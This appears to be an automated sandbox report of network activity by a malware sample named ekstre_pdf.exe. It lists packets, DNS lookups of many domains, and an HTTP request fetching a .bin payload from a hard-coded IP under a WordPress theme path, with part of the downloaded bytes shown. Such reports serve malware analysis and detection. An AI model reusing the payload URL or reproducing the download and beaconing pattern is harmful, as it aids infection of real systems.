Apr 11, 2023 09:51:41.790719986 CEST	49859	80	192.168.11.20	66.29.154.110
Apr 11, 2023 09:51:49.804574013 CEST	49859	80	192.168.11.20	66.29.154.110
Apr 11, 2023 09:51:57.128249884 CEST	49861	80	192.168.11.20	66.29.154.110
Apr 11, 2023 09:51:57.878304958 CEST	49863	80	192.168.11.20	185.53.179.90
Apr 11, 2023 09:51:57.896610022 CEST	80	49863	185.53.179.90	192.168.11.20
Apr 11, 2023 09:51:57.897001982 CEST	49863	80	192.168.11.20	185.53.179.90
Apr 11, 2023 09:51:57.915482044 CEST	80	49863	185.53.179.90	192.168.11.20
Apr 11, 2023 09:51:57.915657043 CEST	49863	80	192.168.11.20	185.53.179.90
Apr 11, 2023 09:51:57.934104919 CEST	80	49863	185.53.179.90	192.168.11.20
Apr 11, 2023 09:51:57.934179068 CEST	80	49863	185.53.179.90	192.168.11.20
Apr 11, 2023 09:51:57.934215069 CEST	80	49863	185.53.179.90	192.168.11.20
Apr 11, 2023 09:51:57.934456110 CEST	49863	80	192.168.11.20	185.53.179.90
Apr 11, 2023 09:51:57.934456110 CEST	49863	80	192.168.11.20	185.53.179.90
Apr 11, 2023 09:51:57.952894926 CEST	80	49863	185.53.179.90	192.168.11.20
Apr 11, 2023 09:51:58.130947113 CEST	49861	80	192.168.11.20	66.29.154.110
Apr 11, 2023 09:52:00.146074057 CEST	49861	80	192.168.11.20	66.29.154.110
Apr 11, 2023 09:52:04.160759926 CEST	49861	80	192.168.11.20	66.29.154.110
Apr 11, 2023 09:52:12.174810886 CEST	49861	80	192.168.11.20	66.29.154.110
Apr 11, 2023 09:52:36.359302044 CEST	49865	80	192.168.11.20	62.149.128.45
Apr 11, 2023 09:52:36.383074999 CEST	80	49865	62.149.128.45	192.168.11.20
Apr 11, 2023 09:52:36.383388042 CEST	49865	80	192.168.11.20	62.149.128.45
Apr 11, 2023 09:52:36.383568048 CEST	49865	80	192.168.11.20	62.149.128.45
Apr 11, 2023 09:52:36.408502102 CEST	80	49865	62.149.128.45	192.168.11.20
Apr 11, 2023 09:52:36.408581972 CEST	80	49865	62.149.128.45	192.168.11.20
Apr 11, 2023 09:52:36.408643961 CEST	80	49865	62.149.128.45	192.168.11.20
Apr 11, 2023 09:52:36.408704996 CEST	80	49865	62.149.128.45	192.168.11.20
Apr 11, 2023 09:52:36.408893108 CEST	49865	80	192.168.11.20	62.149.128.45
Apr 11, 2023 09:52:36.409008026 CEST	49865	80	192.168.11.20	62.149.128.45
Apr 11, 2023 09:52:36.432599068 CEST	80	49865	62.149.128.45	192.168.11.20
Apr 11, 2023 09:52:36.432940960 CEST	49865	80	192.168.11.20	62.149.128.45
Apr 11, 2023 09:52:36.432940960 CEST	49865	80	192.168.11.20	62.149.128.45
Apr 11, 2023 09:52:36.456701040 CEST	80	49865	62.149.128.45	192.168.11.20
Apr 11, 2023 09:52:58.715488911 CEST	49867	80	192.168.11.20	198.54.117.217
Apr 11, 2023 09:52:58.880345106 CEST	80	49867	198.54.117.217	192.168.11.20
Apr 11, 2023 09:52:58.880521059 CEST	49867	80	192.168.11.20	198.54.117.217
Apr 11, 2023 09:52:58.880600929 CEST	49867	80	192.168.11.20	198.54.117.217
Apr 11, 2023 09:52:59.045316935 CEST	80	49867	198.54.117.217	192.168.11.20
Apr 11, 2023 09:52:59.045378923 CEST	80	49867	198.54.117.217	192.168.11.20
Apr 11, 2023 09:53:19.325489998 CEST	49868	80	192.168.11.20	64.190.63.111
Apr 11, 2023 09:53:19.335733891 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.335922003 CEST	49868	80	192.168.11.20	64.190.63.111
Apr 11, 2023 09:53:19.336023092 CEST	49868	80	192.168.11.20	64.190.63.111
Apr 11, 2023 09:53:19.381295919 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.381395102 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.381469011 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.381537914 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.381593943 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.381647110 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.381711006 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.381764889 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.381817102 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.381886959 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.381974936 CEST	49868	80	192.168.11.20	64.190.63.111
Apr 11, 2023 09:53:19.382040024 CEST	49868	80	192.168.11.20	64.190.63.111
Apr 11, 2023 09:53:19.382040024 CEST	49868	80	192.168.11.20	64.190.63.111
Apr 11, 2023 09:53:19.392533064 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.392626047 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.392684937 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.392749071 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.392812014 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.392838955 CEST	49868	80	192.168.11.20	64.190.63.111
Apr 11, 2023 09:53:19.392864943 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.392908096 CEST	49868	80	192.168.11.20	64.190.63.111
Apr 11, 2023 09:53:19.392932892 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.392993927 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.393045902 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:53:19.393074989 CEST	49868	80	192.168.11.20	64.190.63.111
Apr 11, 2023 09:53:19.393160105 CEST	49868	80	192.168.11.20	64.190.63.111
Apr 11, 2023 09:53:19.393363953 CEST	49868	80	192.168.11.20	64.190.63.111
Apr 11, 2023 09:53:19.393409967 CEST	49868	80	192.168.11.20	64.190.63.111
Apr 11, 2023 09:53:19.403959990 CEST	80	49868	64.190.63.111	192.168.11.20
Apr 11, 2023 09:55:01.672032118 CEST	49873	80	192.168.11.20	91.223.253.105
Apr 11, 2023 09:55:01.705411911 CEST	80	49873	91.223.253.105	192.168.11.20
Apr 11, 2023 09:55:01.705804110 CEST	49873	80	192.168.11.20	91.223.253.105
Apr 11, 2023 09:55:01.705805063 CEST	49873	80	192.168.11.20	91.223.253.105
Apr 11, 2023 09:55:01.739373922 CEST	80	49873	91.223.253.105	192.168.11.20
Apr 11, 2023 09:55:01.740053892 CEST	80	49873	91.223.253.105	192.168.11.20
Apr 11, 2023 09:55:01.740124941 CEST	80	49873	91.223.253.105	192.168.11.20
Apr 11, 2023 09:55:01.740175962 CEST	80	49873	91.223.253.105	192.168.11.20
Apr 11, 2023 09:55:01.740488052 CEST	49873	80	192.168.11.20	91.223.253.105
Apr 11, 2023 09:55:01.740488052 CEST	49873	80	192.168.11.20	91.223.253.105
Apr 11, 2023 09:55:01.740564108 CEST	49873	80	192.168.11.20	91.223.253.105
Apr 11, 2023 09:55:01.773736954 CEST	80	49873	91.223.253.105	192.168.11.20
Apr 11, 2023 09:55:21.886096954 CEST	49874	80	192.168.11.20	160.121.87.199
Apr 11, 2023 09:55:22.150285006 CEST	80	49874	160.121.87.199	192.168.11.20
Apr 11, 2023 09:55:22.150535107 CEST	49874	80	192.168.11.20	160.121.87.199
Apr 11, 2023 09:55:22.150588036 CEST	49874	80	192.168.11.20	160.121.87.199
Apr 11, 2023 09:55:22.417404890 CEST	80	49874	160.121.87.199	192.168.11.20
Apr 11, 2023 09:55:22.417486906 CEST	80	49874	160.121.87.199	192.168.11.20
Apr 11, 2023 09:55:22.417520046 CEST	80	49874	160.121.87.199	192.168.11.20
Apr 11, 2023 09:55:22.417840004 CEST	49874	80	192.168.11.20	160.121.87.199
Apr 11, 2023 09:55:22.417963028 CEST	49874	80	192.168.11.20	160.121.87.199
Apr 11, 2023 09:55:22.681759119 CEST	80	49874	160.121.87.199	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 11, 2023 09:49:13.138617992 CEST	59684	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:49:13.187943935 CEST	53	59684	1.1.1.1	192.168.11.20
Apr 11, 2023 09:49:31.663621902 CEST	61155	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:49:31.864353895 CEST	53	61155	1.1.1.1	192.168.11.20
Apr 11, 2023 09:49:52.065071106 CEST	55849	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:49:52.478837013 CEST	53	55849	1.1.1.1	192.168.11.20
Apr 11, 2023 09:50:13.248660088 CEST	57800	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:50:13.264231920 CEST	53	57800	1.1.1.1	192.168.11.20
Apr 11, 2023 09:50:33.464725018 CEST	54419	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:50:33.799144983 CEST	53	54419	1.1.1.1	192.168.11.20
Apr 11, 2023 09:50:54.395152092 CEST	55151	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:50:54.719610929 CEST	53	55151	1.1.1.1	192.168.11.20
Apr 11, 2023 09:51:15.265958071 CEST	60261	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:51:15.923440933 CEST	53	60261	1.1.1.1	192.168.11.20
Apr 11, 2023 09:51:34.605818033 CEST	54643	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:51:34.767541885 CEST	53	54643	1.1.1.1	192.168.11.20
Apr 11, 2023 09:51:57.103704929 CEST	64928	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:51:57.120604992 CEST	53	64928	1.1.1.1	192.168.11.20
Apr 11, 2023 09:51:57.834927082 CEST	56133	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:51:57.877541065 CEST	53	56133	1.1.1.1	192.168.11.20
Apr 11, 2023 09:52:16.096122980 CEST	55806	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:52:16.112334013 CEST	53	55806	1.1.1.1	192.168.11.20
Apr 11, 2023 09:52:36.263736010 CEST	55902	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:52:36.358263969 CEST	53	55902	1.1.1.1	192.168.11.20
Apr 11, 2023 09:52:58.587260962 CEST	51382	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:52:58.714175940 CEST	53	51382	1.1.1.1	192.168.11.20
Apr 11, 2023 09:53:19.191693068 CEST	63664	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:53:19.324647903 CEST	53	63664	1.1.1.1	192.168.11.20
Apr 11, 2023 09:53:39.531128883 CEST	57842	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:53:39.950674057 CEST	53	57842	1.1.1.1	192.168.11.20
Apr 11, 2023 09:53:39.951081038 CEST	57842	53	192.168.11.20	9.9.9.9
Apr 11, 2023 09:53:40.651326895 CEST	53	57842	9.9.9.9	192.168.11.20
Apr 11, 2023 09:53:58.773974895 CEST	57154	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:53:59.171163082 CEST	53	57154	1.1.1.1	192.168.11.20
Apr 11, 2023 09:53:59.171528101 CEST	57154	53	192.168.11.20	9.9.9.9
Apr 11, 2023 09:53:59.424237013 CEST	53	57154	9.9.9.9	192.168.11.20
Apr 11, 2023 09:54:48.361840963 CEST	51807	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:54:48.797782898 CEST	53	51807	1.1.1.1	192.168.11.20
Apr 11, 2023 09:54:48.798309088 CEST	51807	53	192.168.11.20	9.9.9.9
Apr 11, 2023 09:54:49.502168894 CEST	53	51807	9.9.9.9	192.168.11.20
Apr 11, 2023 09:55:01.593748093 CEST	50084	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:55:01.671159029 CEST	53	50084	1.1.1.1	192.168.11.20
Apr 11, 2023 09:55:42.568763018 CEST	63653	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:55:42.985090017 CEST	53	63653	1.1.1.1	192.168.11.20
Apr 11, 2023 09:55:42.985577106 CEST	63653	53	192.168.11.20	9.9.9.9
Apr 11, 2023 09:55:43.363384962 CEST	53	63653	9.9.9.9	192.168.11.20
Apr 11, 2023 09:56:04.063916922 CEST	49824	53	192.168.11.20	1.1.1.1
Apr 11, 2023 09:56:04.546971083 CEST	53	49824	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 11, 2023 09:49:13.138617992 CEST	192.168.11.20	1.1.1.1	0x9d76	Standard query (0)	www.anotherworldrecord.com	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:49:31.663621902 CEST	192.168.11.20	1.1.1.1	0x3b88	Standard query (0)	www.credit-cards-54889.com	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:49:52.065071106 CEST	192.168.11.20	1.1.1.1	0xbc6d	Standard query (0)	www.jewelry2adore.biz	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:50:13.248660088 CEST	192.168.11.20	1.1.1.1	0x6faf	Standard query (0)	www.licensescape.com	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:50:33.464725018 CEST	192.168.11.20	1.1.1.1	0xdf56	Standard query (0)	www.jenniferfalconerrealtor.com	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:50:54.395152092 CEST	192.168.11.20	1.1.1.1	0xd28e	Standard query (0)	www.xqan.net	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:51:15.265958071 CEST	192.168.11.20	1.1.1.1	0x5eef	Standard query (0)	www.anjin98.com	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:51:34.605818033 CEST	192.168.11.20	1.1.1.1	0x92c0	Standard query (0)	www.healthinsurancearena.com	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:51:57.103704929 CEST	192.168.11.20	1.1.1.1	0x8715	Standard query (0)	www.healthinsurancearena.com	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:51:57.834927082 CEST	192.168.11.20	1.1.1.1	0x16b2	Standard query (0)	www.furniture-42269.com	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:52:16.096122980 CEST	192.168.11.20	1.1.1.1	0x5383	Standard query (0)	www.centracul.online	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:52:36.263736010 CEST	192.168.11.20	1.1.1.1	0x7e5a	Standard query (0)	www.iltuosentiero.com	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:52:58.587260962 CEST	192.168.11.20	1.1.1.1	0xdb01	Standard query (0)	www.crosswalkconsulting.co.uk	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:53:19.191693068 CEST	192.168.11.20	1.1.1.1	0x3e8	Standard query (0)	www.dinero.news	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:53:39.531128883 CEST	192.168.11.20	1.1.1.1	0x5c82	Standard query (0)	www.tmcgroup.africa	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:53:39.951081038 CEST	192.168.11.20	9.9.9.9	0x5c82	Standard query (0)	www.tmcgroup.africa	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:53:58.773974895 CEST	192.168.11.20	1.1.1.1	0x7f1b	Standard query (0)	www.zetuinteriors.africa	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:53:59.171528101 CEST	192.168.11.20	9.9.9.9	0x7f1b	Standard query (0)	www.zetuinteriors.africa	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:54:48.361840963 CEST	192.168.11.20	1.1.1.1	0xa280	Standard query (0)	www.bril-kre-l25.buzz	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:54:48.798309088 CEST	192.168.11.20	9.9.9.9	0xa280	Standard query (0)	www.bril-kre-l25.buzz	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:55:01.593748093 CEST	192.168.11.20	1.1.1.1	0x22d1	Standard query (0)	www.athle91.com	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:55:42.568763018 CEST	192.168.11.20	1.1.1.1	0x9008	Standard query (0)	www.kevinjasperinc.africa	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:55:42.985577106 CEST	192.168.11.20	9.9.9.9	0x9008	Standard query (0)	www.kevinjasperinc.africa	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:56:04.063916922 CEST	192.168.11.20	1.1.1.1	0x97fa	Standard query (0)	www.hanfengmeiye.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 11, 2023 09:49:13.187943935 CEST	1.1.1.1	192.168.11.20	0x9d76	No error (0)	www.anotherworldrecord.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 11, 2023 09:49:13.187943935 CEST	1.1.1.1	192.168.11.20	0x9d76	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:49:13.187943935 CEST	1.1.1.1	192.168.11.20	0x9d76	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:49:13.187943935 CEST	1.1.1.1	192.168.11.20	0x9d76	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:49:13.187943935 CEST	1.1.1.1	192.168.11.20	0x9d76	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:49:13.187943935 CEST	1.1.1.1	192.168.11.20	0x9d76	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:49:13.187943935 CEST	1.1.1.1	192.168.11.20	0x9d76	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:49:13.187943935 CEST	1.1.1.1	192.168.11.20	0x9d76	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:49:31.864353895 CEST	1.1.1.1	192.168.11.20	0x3b88	No error (0)	www.credit-cards-54889.com		185.53.179.91	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:49:52.478837013 CEST	1.1.1.1	192.168.11.20	0xbc6d	No error (0)	www.jewelry2adore.biz		204.11.56.48	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:50:13.264231920 CEST	1.1.1.1	192.168.11.20	0x6faf	No error (0)	www.licensescape.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:50:33.799144983 CEST	1.1.1.1	192.168.11.20	0xdf56	No error (0)	www.jenniferfalconerrealtor.com	dugout.moxiworks.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 11, 2023 09:50:33.799144983 CEST	1.1.1.1	192.168.11.20	0xdf56	No error (0)	dugout.moxiworks.com	lb-agent-dugout-pr.moxiworks.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 11, 2023 09:50:33.799144983 CEST	1.1.1.1	192.168.11.20	0xdf56	No error (0)	lb-agent-dugout-pr.moxiworks.com		64.246.164.134	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:50:54.719610929 CEST	1.1.1.1	192.168.11.20	0xd28e	No error (0)	www.xqan.net		38.163.115.131	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:51:15.923440933 CEST	1.1.1.1	192.168.11.20	0x5eef	No error (0)	www.anjin98.com		160.121.87.199	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:51:34.767541885 CEST	1.1.1.1	192.168.11.20	0x92c0	No error (0)	www.healthinsurancearena.com	healthinsurancearena.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 11, 2023 09:51:34.767541885 CEST	1.1.1.1	192.168.11.20	0x92c0	No error (0)	healthinsurancearena.com		66.29.154.110	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:51:57.120604992 CEST	1.1.1.1	192.168.11.20	0x8715	No error (0)	www.healthinsurancearena.com	healthinsurancearena.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 11, 2023 09:51:57.120604992 CEST	1.1.1.1	192.168.11.20	0x8715	No error (0)	healthinsurancearena.com		66.29.154.110	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:51:57.877541065 CEST	1.1.1.1	192.168.11.20	0x16b2	No error (0)	www.furniture-42269.com		185.53.179.90	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:52:16.112334013 CEST	1.1.1.1	192.168.11.20	0x5383	Name error (3)	www.centracul.online	none	none	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:52:36.358263969 CEST	1.1.1.1	192.168.11.20	0x7e5a	No error (0)	www.iltuosentiero.com	iltuosentiero.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 11, 2023 09:52:36.358263969 CEST	1.1.1.1	192.168.11.20	0x7e5a	No error (0)	iltuosentiero.com		62.149.128.45	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:52:58.714175940 CEST	1.1.1.1	192.168.11.20	0xdb01	No error (0)	www.crosswalkconsulting.co.uk	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 11, 2023 09:52:58.714175940 CEST	1.1.1.1	192.168.11.20	0xdb01	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:52:58.714175940 CEST	1.1.1.1	192.168.11.20	0xdb01	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:52:58.714175940 CEST	1.1.1.1	192.168.11.20	0xdb01	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:52:58.714175940 CEST	1.1.1.1	192.168.11.20	0xdb01	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:52:58.714175940 CEST	1.1.1.1	192.168.11.20	0xdb01	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:52:58.714175940 CEST	1.1.1.1	192.168.11.20	0xdb01	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:52:58.714175940 CEST	1.1.1.1	192.168.11.20	0xdb01	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:53:19.324647903 CEST	1.1.1.1	192.168.11.20	0x3e8	No error (0)	www.dinero.news		64.190.63.111	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:53:39.950674057 CEST	1.1.1.1	192.168.11.20	0x5c82	Server failure (2)	www.tmcgroup.africa	none	none	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:53:40.651326895 CEST	9.9.9.9	192.168.11.20	0x5c82	Server failure (2)	www.tmcgroup.africa	none	none	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:53:59.171163082 CEST	1.1.1.1	192.168.11.20	0x7f1b	Server failure (2)	www.zetuinteriors.africa	none	none	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:53:59.424237013 CEST	9.9.9.9	192.168.11.20	0x7f1b	Server failure (2)	www.zetuinteriors.africa	none	none	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:54:48.797782898 CEST	1.1.1.1	192.168.11.20	0xa280	Server failure (2)	www.bril-kre-l25.buzz	none	none	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:54:49.502168894 CEST	9.9.9.9	192.168.11.20	0xa280	Server failure (2)	www.bril-kre-l25.buzz	none	none	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:55:01.671159029 CEST	1.1.1.1	192.168.11.20	0x22d1	No error (0)	www.athle91.com	athle91.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 11, 2023 09:55:01.671159029 CEST	1.1.1.1	192.168.11.20	0x22d1	No error (0)	athle91.com		91.223.253.105	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:55:42.985090017 CEST	1.1.1.1	192.168.11.20	0x9008	Server failure (2)	www.kevinjasperinc.africa	none	none	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:55:43.363384962 CEST	9.9.9.9	192.168.11.20	0x9008	Server failure (2)	www.kevinjasperinc.africa	none	none	A (IP address)	IN (0x0001)	false
Apr 11, 2023 09:56:04.546971083 CEST	1.1.1.1	192.168.11.20	0x97fa	No error (0)	www.hanfengmeiye.com		154.23.133.34	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

34.138.169.8

www.anotherworldrecord.com

www.credit-cards-54889.com

www.jewelry2adore.biz

www.licensescape.com

www.jenniferfalconerrealtor.com

www.xqan.net

www.anjin98.com

www.furniture-42269.com

www.iltuosentiero.com

www.crosswalkconsulting.co.uk

www.dinero.news

www.athle91.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49844	34.138.169.8	80	C:\Users\user\Desktop\ekstre_pdf.exe

Timestamp	kBytes transferred	Direction	Data
Apr 11, 2023 09:48:14.448693991 CEST	273	OUT	GET /wp-content/themes/seotheme/RenHLfAoTIbu98.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 34.138.169.8 Cache-Control: no-cache
Apr 11, 2023 09:48:14.611736059 CEST	274	IN	HTTP/1.1 200 OK Date: Tue, 11 Apr 2023 07:48:14 GMT Server: Apache/2.4.51 (Unix) OpenSSL/1.1.1n Last-Modified: Tue, 21 Mar 2023 22:37:46 GMT ETag: "2e640-5f770b150a4e5" Accept-Ranges: bytes Content-Length: 190016 Content-Type: application/octet-stream Data Raw: ee c1 3a 56 68 91 54 04 6d 29 61 8f a0 97 9f 6f e2 1d 3c 3e f0 c1 f3 d6 08 75 33 de a3 b4 39 f2 60 3a ec 4c 90 62 3f e2 71 25 67 d1 d4 4a 07 fc 15 ac 43 da e3 00 7b 52 84 5a a4 39 ff a1 5f c8 c1 82 a6 c5 86 6a 11 9b 88 16 a2 d7 bd dc c6 13 ad 20 c0 98 ac 98 ea 0d eb 22 56 59 41 0b db 88 3f 9d 4d cc 8a 8a 33 74 2c e2 bb e0 77 3b ba a5 f0 99 c1 e9 7f 7d c0 7f 1c ca e9 8e de 33 d1 36 42 13 28 49 2c 6e 80 b6 90 a1 9b cc 6a 23 a8 76 35 92 45 ae ab 31 34 b6 60 74 ca 46 58 59 4e a8 d4 8a 37 18 66 34 52 4f a5 35 e5 1f c3 0d b5 64 61 c4 0c f7 37 7d f1 55 b8 2e 8f 60 30 af 6d 09 44 e4 bc 8a 19 99 0f e2 64 ad 4b c0 32 10 0a af 71 20 c4 51 af 91 ad b8 34 a5 a8 e3 4c 4d 8f 3a 79 14 d8 db 81 c4 00 7a 2a 76 33 58 d3 f7 42 32 2f b6 4f 3e 79 c0 74 6c ff f6 f8 75 40 3b 07 69 56 38 13 b6 4a 25 e6 94 ff 61 0a 11 99 fe cd e2 20 1e 89 03 1c 74 fc f0 30 4d f6 4c 23 e4 01 ef 87 fa 7f e3 5b 04 a9 09 16 fc e2 ea 14 c9 7f 82 b8 59 2a 83 40 78 37 9c 7d e8 d6 b2 bd 4a fe db 06 62 b4 4b 44 34 3a 5a fd e0 6a 81 e0 99 ac 37 e6 c9 0a 55 51 cd 2e 7e 8b eb e8 8b 5c 65 0f 72 00 38 7e 32 61 e9 7e 4f 5c ad 3e a1 cf c1 71 b2 d9 33 cc e1 6e c9 9a 3f ee 06 3f 9f ba 23 f3 a3 7d f1 dc 66 52 93 12 06 0a 35 9c f7 60 02 02 cb dd bd 4f 70 e2 01 bd 76 93 2a a7 1f 95 3b 3c f5 94 1b 04 a1 78 c2 05 75 06 4c 37 19 e3 7f c4 12 e9 cf 49 be 7b b5 b0 2a 47 cf 89 54 ab 8f b7 bb 4d 23 e0 22 46 4d 62 28 8b 74 67 f7 07 17 42 cd 69 06 f7 75 eb dd ab af 54 52 5e da 25 eb c9 70 1d 7c 27 a1 83 e6 20 06 88 a4 d1 13 6a 73 92 12 19 d0 c1 3d e4 dd ff b4 d5 24 f6 37 a5 ce 60 8f 3c e0 1a d1 b4 54 96 59 f2 87 ae 7d 48 74 9e e7 5f 26 36 c9 58 a4 f1 07 4e c2 3e b9 86 49 b7 b5 71 2c b5 32 44 1e e4 67 2b f7 a4 09 2c 2b 0f 91 a9 02 42 ef 0a 8c 20 08 fe d1 34 c7 a0 f9 46 dd 3c ea ee d8 78 91 1a f7 69 0c 05 8c 91 4a 22 12 8e 7c aa 91 a6 90 ac 50 33 ea 4f 6b 07 71 c8 34 73 b3 63 fa ff ce 7c 19 db 29 e4 77 96 64 03 d0 b9 6b 03 5d 1a 1d ff 5e 1b 9f b2 54 d1 0e 98 aa f9 65 e7 cd 01 8b 9d 83 8a 11 f3 4b 5f d6 b9 2f b0 c7 a8 b7 ab 5d 37 0c 7f d6 01 ea 4b 21 61 63 18 99 e4 a3 1c c6 9f 32 68 f5 62 a7 e4 8a e4 e4 f8 d0 34 b5 06 aa 1f 06 f6 49 8b 19 4e 24 0b a5 39 51 1c 4b 49 1c 91 a9 87 28 5b d0 bd 82 89 79 8c ce d0 14 31 f2 98 52 1b e0 57 09 bf cc 54 62 3d d2 18 8a 49 d3 bb 59 32 e2 79 a8 c5 bf b8 46 9f 31 75 00 89 2a 